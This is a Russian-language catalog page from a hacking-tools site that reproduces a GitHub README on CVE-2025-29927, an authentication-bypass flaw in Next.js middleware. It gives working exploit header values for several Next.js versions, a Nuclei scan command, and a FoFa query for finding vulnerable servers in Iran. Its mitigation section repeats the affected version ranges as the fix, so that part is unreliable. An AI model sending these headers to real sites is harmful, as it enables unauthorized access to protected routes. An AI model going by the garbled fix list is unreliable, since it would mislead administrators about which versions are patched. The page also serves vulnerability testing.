Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927 — CVE-2025-29927: Уязвимость обхода Middleware в Next.js | Kitploit
Инструменты/GitHubGitHub/kh4sh3i/cve-2025-29927
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Уязвимость обхода Middleware в Next.js

Репозиторий
2111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться



CVE-2025-29927

CVE-2025-29927: уязвимость обхода middleware в Next.js Этот репозиторий демонстрирует уязвимость CVE-2025-29927 в Next.js, где внутренний заголовок x-middleware-subrequest может использоваться для обхода проверок middleware, таких как аутентификация.

Затронутые версии

Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Смягчение и устранение уязвимости

  • Обновите Next.js до исправленных версий:
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Если немедленное обновление невозможно, заблокируйте или удалите заголовок x-middleware-subrequest на уровне веб-сервера или прокси:

Сценарии воздействия

  • Обход авторизации: злоумышленники могут получить доступ к защищённым маршрутам без надлежащей аутентификации или авторизации.
  • Обход Content Security Policy (CSP): если заголовки CSP добавляются через middleware, злоумышленники могут обойти эти средства контроля безопасности, что потенциально позволяет проводить атаки с межсайтовым скриптингом (XSS).
  • Отказ в обслуживании через отравление кэша: в определённых конфигурациях злоумышленники могут отравить кэш несанкционированным содержимым, обходя middleware, устанавливающий заголовки управления кэшем.

Использование шаблона Nuclei nextjs-CVE-2025-29927

nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Эксплуатация в различных версиях Next.js

  • Для версий до 12.2:
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • Для версий 12.2 и новее:
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • Для версий 13.2.0 и новее:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Поиск целей с помощью FoFa

header="x-middleware-rewrite" && country="IR"

бесплатный CTF для этого

  • CTF
Скачать инструмент